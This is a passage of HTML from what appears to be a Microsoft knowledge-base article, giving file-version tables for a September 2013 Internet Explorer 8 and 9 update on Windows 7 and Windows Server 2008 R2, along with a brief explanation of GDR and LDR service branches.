class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">768,512</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">231,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:26</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">09:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">104,448</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,800,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,806,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Windows 7 and Windows Server 2008 R2 file information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>. <span class=\"text-base\">17</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">0</span>. <span class=\"text-base\">21</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">1</span>. <span class=\"text-base\">18</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.760<span class=\"text-base\">1</span>. <span class=\"text-base\">22</span>xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes. </li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><h3 class=\"sbody-h3\">Internet Explorer 8</h3><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,231,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,233,408</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">48,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">981,504</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">68,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">48,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">982,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">68,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:15</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">860,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">860,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">627,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">627,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">67,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">67,584</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">6,036,480</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">6,038,016</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">163,328</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">163,328</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">200,704</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">200,704</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">525,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">525,312</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,078,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.18269</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,078,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.22464</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">760,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">760,320</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">132,096</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">11,020,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">11,020,800</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">13,270</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">09:03</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported Itanium-based versions of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,731,008</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,734,592</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:41</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">114,176</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,200,576</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">114,176</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,201,088</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:42</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">189,952</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:42</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,020,352</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,020,352</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,354,240</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,354,240</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:16</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">222,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">222,208</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">17,454,592</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">07:54</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,141</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">17,456,640</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:09</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">514,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">514,048</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">521,216</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">521,216</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">976,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">976,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,955,264</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:25</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.18269</td><td class=\"sbody-td\">592,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,955,264</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:40</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.1.7601.22464</td><td class=\"sbody-td\">592,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:41</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">2,203,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">2,203,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:41</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.18269</td><td class=\"sbody-td\">155,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:26</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.7601.22464</td><td class=\"sbody-td\">155,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">08:41</td><td class=\"sbody-td\">IA-64</td></tr><tr 